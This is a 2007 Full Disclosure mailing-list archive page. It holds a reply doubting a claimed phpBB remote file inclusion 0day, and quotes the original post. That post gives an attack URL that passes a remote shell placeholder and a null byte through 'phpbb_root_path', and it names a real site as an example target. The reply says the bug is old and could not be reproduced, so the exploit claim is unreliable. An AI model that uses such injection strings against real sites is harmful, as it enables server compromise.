Full Disclosure mailing list archives
[RE: 0DAY RFI in phpBB <= 2.0.22 HOT]
From: jeroen <nowhereman () moenen org>
Date: Wed, 06 Jun 2007 21:48:59 +0200
AFAIK this is a very old bug and has been fixed in all modules? I've tested your vuln against a few installs of phpBB and can't reproduce it... so seems it's been patched allready? http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0981.html Regards, Jeroen -------- -------- From: dr.rezen () gmail com To: full-disclosure () lists grok org uk Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT Date: Fri, 01 Jun 2007 13:05:01 -0400 New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week: victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00 For example: http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00 Enjoy :) BUG BY REZEN! XORCREW! H4X H4X! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [RE: 0DAY RFI in phpBB <= 2.0.22 HOT] jeroen (Jun 06)